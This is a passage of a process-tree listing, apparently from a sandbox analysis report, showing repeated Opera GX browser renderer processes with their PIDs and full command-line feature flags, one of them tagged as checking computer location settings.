PID:10664
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=8584,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9348 /prefetch:12⤵PID:9012
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=6812,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9396 /prefetch:12⤵PID:11316
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=8148,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8684 /prefetch:12⤵PID:9912
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=5676,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9448 /prefetch:12⤵PID:312
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=9144,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9720 /prefetch:12⤵PID:12140
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --field-trial-handle=9724,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9656 /prefetch:12⤵
- Checks computer location settings
PID:9328
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=9592,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9668 /prefetch:12⤵PID:5012
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --field-trial-handle=9632,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9424 /prefetch:12⤵PID:1176
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=9496,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9376 /prefetch:12⤵PID:11512
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=7188,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9420 /prefetch:12⤵PID:11716
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=9360,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9312 /prefetch:12⤵PID:10416
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --field-trial-handle=7448,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8700 /prefetch:12⤵PID:7792
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --field-trial-handle=7636,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=5552 /prefetch:12⤵PID:5692
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --field-trial-handle=8600,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9664 /prefetch:12⤵PID:7292
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --field-trial-handle=9680,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8876 /prefetch:12⤵PID:8548
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --field-trial-handle=8772,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9508 /prefetch:12⤵PID:6832
-
-
